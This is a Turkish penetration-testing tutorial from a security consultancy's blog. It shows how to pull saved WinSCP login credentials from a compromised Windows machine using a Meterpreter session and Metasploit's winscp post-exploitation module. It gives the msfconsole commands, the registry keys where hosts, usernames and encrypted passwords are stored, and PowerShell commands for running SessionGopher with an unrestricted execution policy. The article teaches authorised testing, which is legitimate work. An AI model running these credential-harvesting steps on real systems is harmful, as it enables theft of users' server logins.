Meterpreter Bağlantısı Elde Edilmiş Olan Windows Bilgisayarda MSF winscp Post Modülü ile Winscp Uygulamasındaki Erişim Bilgilerinin Elde Edilmesi

0
213
views
Sızma testleri sırasında Meterpreter ile bağlantı kurulabilmiş olan bir bilgisayarda kritik bilgi elde edilmeye çalışılır. Bu yazıda, Meterpreter erişimi elde edilmiş bir Windows istemcinin Winscp uygulamasında kayıtlı olan erişim bilgileri MSF winscp post modülü ile elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

W7 adlı bir bilgisayarda SYSTEM hakları ile Meterpreter bağlantısının elde edildiği görülmektedir. MSF winscp post modülü ile Winscp uygulamasının içerisinde kayıtlı olan erişim bilgilerinin elde edilmesi için modül seçilir ve seçenekleri incelenir.

sessions
search winscp
use post/windows/gather/credentials/winscp
show options

acquiring-sensitive-logon-informations-on-winscp-client-by-using-msf-winscp-post-module-01

Modüle oturum ID değeri verilerek modül çalışıtırılır ve Winscp uygulamasında kayıtlı olan kimlik bilgileri ele geçirilir.

set SESSION 1
show options
run

acquiring-sensitive-logon-informations-on-winscp-client-by-using-msf-winscp-post-module-02

Not: Winscp uygulamasında kayıtlı erişim bilgileri, Kayıt Defteri üzerinde “HKEY_USERS\<KullaniciSID>\Software\Martin Prikryl\Winscp 2\Sessions” anahtarı altındaki anahtarlarda kayıtlıdır. Bağlantı kurulacak IP değeri ve kullanıcı adı bilgisi açık olarak saklanırken, parola bilgisi ise şifreli olarak saklanır.

acquiring-sensitive-logon-informations-on-winscp-client-by-using-msf-winscp-post-module-03

 

Şifreli olan bu parola değerini açık metin olarak elde edebilmek için şifre çözme anahtarı olarak “HKEY_USERS\<KullaniciSID>\Software\Martin Prikryl\Winscp 2\Configuration\Security” anahtarı altındaki REG_DWORD tipindeki UseMasterPassword değeri kullanılır.

Bu işlemler için Fireeye tarafından hazırlanmış SessionGopher betiğindeki DecryptWinSCPPassword metodu da kullanılabilir.

https://github.com/fireeye/SessionGopher/blob/master/SessionGopher.ps1

Powershell.exe -ExecutionPolicy Unrestricted
Import-Module .\SessionGopoher.ps1
Invoke-SessionGopher -Thorough

 

 

 

 

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

This site uses Akismet to reduce spam. Learn how your comment data is processed.